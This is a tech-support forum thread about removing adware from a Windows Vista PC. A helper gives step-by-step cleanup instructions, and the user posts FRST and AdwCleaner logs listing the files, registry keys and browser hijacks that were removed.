2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-02 18:05 - 00000000 ____D () C:\AdwCleaner
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-12 20:55 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-12 20:54 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-12 20:54 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-12 20:54 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-12 20:54 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-12 20:54 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-12 20:54 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-12 20:53 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:34 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-12 20:13 - 2014-09-29 09:07 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-12 20:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 19:37 - 2014-09-21 20:39 - 00000000 ____D () C:\Program Files\LPT
2015-04-02 19:37 - 2014-09-21 20:38 - 00000000 ____D () C:\Users\Angel\AppData\Local\LPT
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StormWatch
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Users\Angel\AppData\Local\StormWatch
2015-04-02 19:33 - 2015-01-27 17:54 - 00000000 ____D () C:\Program Files\StormWatch
2015-04-02 19:13 - 2015-02-16 13:17 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-11-17 14:18 - 00000000 ____D () C:\Program Files\Shop For Rewards
2015-04-02 18:34 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-23 14:35 - 00000000 ____D () C:\ProgramData\Browser
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2014-08-08 21:24 - 00000000 ____D () C:\Program Files\Driver Pro
2015-04-02 18:34 - 2014-08-03 18:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
2015-04-02 18:34 - 2014-07-22 15:06 - 00000000 ____D () C:\ProgramData\76e44fa5fad02a2d
2015-04-02 18:34 - 2013-07-12 20:48 - 00000000 ____D () C:\Program Files\AskPartnerNetwork
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-10-06 10:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2015-04-02 18:34 - 2009-10-06 10:43 - 00000000 ____D () C:\Program Files\Coupons
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
Some content of TEMP:
====================
C:\Users\Angel\AppData\Local\Temp\ReimagePackage.exe
C:\Users\Angel\AppData\Local\Temp\ReiSysUpdate.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-12 21:01
 
==================== End Of Log ============================


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 13 April 2015 - 02:37 AM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully:

  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.

Step 1

  • Please download and install Revo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s) to remove it:
    Coupon Printer for Windows
    Reimage Repair
    Shopping Helper Smartbar
    Shopping Helper Smartbar Engin
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run, If prompted again click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

Step 2

Scan with AdwCleaner (by Xplode).

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a log file (that is saved in C:\AdwCleaner[S#].txt) will open automatically.
    Copy and paste the contents of that logfile in your next reply.

Step 3

Please download and install Malwarebytes Anti-Malware. (NEW VERSION!)

  • Please open Malwarebytes Anti-Malware and update the database.
  • Click "Settings" [1] and go to "Detection and Protection" [2]
  • Make sure "Scan for Rootkits" is checked.
  • Click on Dashboard [3], then click on Scan Now [4] to start the scan.
    If Malware or Potentially Unwanted Programs [PUPs] are found, you will receive a prompt:
  • Click on "Remove Selected" [5].
  • Then click "Save Results" [6] and select
    m21p4.png
  • Return to our forum. Paste your log into your next reply and then click Finish [7].

Step 4

Start FRST with administrator privileges.

  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#3 SereneSnake

SereneSnake
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  • Local time:04:30 AM

Posted 13 April 2015 - 03:30 PM

Hello! Thank you for the quick response and detailed instructions. I hope I followed them correctly.

 

# AdwCleaner v4.200 - Logfile created 02/04/2015 at 14:14:40
# Updated 29/03/2015 by Xplode
# Database : 2015-03-29.1 [Local]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (x86)
# Username : Angel - ANGEL-PC
# Running from : C:\Users\Angel\Downloads\adwcleaner_4.200.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : netfilter
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\apn
Folder Deleted : C:\ProgramData\Browser
Folder Deleted : C:\ProgramData\Systweak
Folder Deleted : C:\ProgramData\Reimage Protector
Folder Deleted : C:\ProgramData\SaveerPro
Folder Deleted : C:\ProgramData\SaverAdddon
Folder Deleted : C:\ProgramData\saveROn
Folder Deleted : C:\ProgramData\76e44fa5fad02a2d
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Deleted : C:\Program Files\AskPartnerNetwork
Folder Deleted : C:\Program Files\Driver Pro
Folder Deleted : C:\Program Files\globalUpdate
Folder Deleted : C:\Program Files\LPT
Folder Deleted : C:\Program Files\predm
Folder Deleted : C:\Program Files\Reimage
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\Program Files\Universal Updater
Folder Deleted : C:\Program Files\Elex-tech
Folder Deleted : C:\Program Files\Krab Web
Folder Deleted : C:\Program Files\Coupons
Folder Deleted : C:\Program Files\SaveerPro
Folder Deleted : C:\Program Files\SaverAdddon
Folder Deleted : C:\Program Files\saveROn
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\apn
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\iSafeRightKeyScan
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\Krab Web
Folder Deleted : C:\Users\Angel\AppData\Local\Temp\Deal Keeper
Folder Deleted : C:\Users\Angel\AppData\Local\globalUpdate
Folder Deleted : C:\Users\Angel\AppData\Local\LPT
Folder Deleted : C:\Users\Angel\AppData\Roaming\eCyber
Folder Deleted : C:\Users\Angel\AppData\Roaming\Systweak
Folder Deleted : C:\Users\Angel\AppData\Roaming\Elex-tech
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org
Folder Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822}
File Deleted : C:\Windows\Reimage.ini
File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Program Files\Mozilla Firefox\components\AskSearch.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\invalidprefs.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\ask-search.xml
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\web-search.xml
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_plarium.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_plarium.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.safefinder.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.safefinder.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.snapdo.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.snapdo.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage-journal
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_uk.ask.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage
File Deleted : C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage-journal
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla
Key Deleted : HKLM\SOFTWARE\Classes\Conduit.Engine
Key Deleted : HKLM\SOFTWARE\Classes\speedupmypc
Key Deleted : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Update Krab Web
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Util Krab Web
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2418376
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{787D3F9B-69C6-427C-BF55-4419F932474A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D52F7CE0-A4BA-4220-A907-444CB6158A09}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5075DFCC-F3F5-4B15-B364-270BC7C585AD}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{895F78F3-9620-49AD-8AA8-E6802E5AC64E}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{0902EBD9-C5B4-4400-8CF1-7ACA8E8805D9}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35D-6118-11DC-9C72-001320C79847}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKCU\Software\Driver Pro
Key Deleted : HKCU\Software\PennyBee
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKLM\SOFTWARE\TBID
Key Deleted : HKLM\SOFTWARE\SPPDCOM
Key Deleted : HKLM\SOFTWARE\Elex-tech
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Protector
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows4.0
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C64BEB42-B25D-4674-BB55-4099CB720110}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{BC0BF363-63AB-4FF7-8EF1-AE0D7F711B24}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\conduitEngine
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\iSafe
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\RocketTab
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\TVWizard
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Salus
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Reimage Protector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows4.0
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{C64BEB42-B25D-4674-BB55-4099CB720110}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Krab Web
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\5E8031606EB60A64C882918F8FF38DD4
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\safefinder.com
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:49172;hxxps=127.0.0.1:49172
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16633
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v41.0.2272.101
 
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://movies.netflix.com/WiSearch?raw_query=&ac_category_type=none&ac_rel_posn=-1&ac_abs_posn=-1&v1={searchTerms}&search_submit=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.snapdo.com/?q={searchTerms}&category=Web&publisher=outbrowse&country=us&feedid=infospace&st=dn&dpid=us&lan=en&start=1
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3331457&octid=EB_ORIGINAL_CTID&ISID=ME1FC3FAD-3B46-4CE1-AA60-5D5A354F60F6&SearchSource=58&CUI=&UM=6&UP=SP5D0B0B4F-0DC0-4710-8CDE-E0F8CDF5FDBD&q={searchTerms}&SSPV=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_coinis_15_13&cd=2XzuyEtN2Y1L1QzutDtDtBtCzy0BtByDyEzz0DyDyCyD0DtDtN0D0Tzu0StCtCzztBtN1L2XzutAtFzztFtAtFtCtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StDyDtAtB0Bzy0CtDtGtB0Fzy0AtGtBtDyEyCtG0EzyyC0DtGyE0DyBtAyB0CyB0E0DyC0DyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtByE0BtDzytDyDtG0F0C0DyDtGyEtB0EtBtG0AtC0A0CtGtC0F0A0FtDtB0F0D0F0EyCyB2QtN1B2Z1V1T1S1NzuyCtAyB&cr=1070897748&ir=
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : blmchfpimpbbdmgpcieclabeafkljbhm
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : dndlcbaomdoggooaficldplkcmkfpgff
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : elggllhppljlljkgfeokjpehmdamkejk
[C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Default_Search_Provider_Data] : 
 
*************************
 
AdwCleaner[R0].txt - [18084 bytes] - [02/04/2015 14:13:29]
AdwCleaner[S0].txt - [11478 bytes] - [02/04/2015 14:14:40]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [11538  bytes] ##########
# AdwCleaner v4.201 - Logfile created 13/04/2015 at 14:34:33
# Updated 08/04/2015 by Xplode
# Database : 2015-04-08.1 [Local]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (x86)
# Username : Angel - ANGEL-PC
# Running from : C:\Users\Angel\Downloads\adwcleaner_4.201.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[#] Service Deleted : netfilter
[#] Service Deleted : ReimageRealTimeProtector
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\rei
Folder Deleted : C:\ProgramData\Browser
Folder Deleted : C:\ProgramData\Reimage Protector
Folder Deleted : C:\ProgramData\76e44fa5fad02a2d
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reimage repair
Folder Deleted : C:\Program Files\AskPartnerNetwork
Folder Deleted : C:\Program Files\Driver Pro
Folder Deleted : C:\Program Files\LPT
Folder Deleted : C:\Program Files\Reimage
Folder Deleted : C:\Program Files\StormWatch
Folder Deleted : C:\Program Files\Shop For Rewards
Folder Deleted : C:\Users\Angel\AppData\Local\LPT
Folder Deleted : C:\Users\Angel\AppData\Local\StormWatch
Folder Deleted : C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StormWatch
File Deleted : C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
File Deleted : C:\Windows\Reimage.ini
File Deleted : C:\Windows\score.exe
File Deleted : C:\Windows\system32\dsrvprn.exe
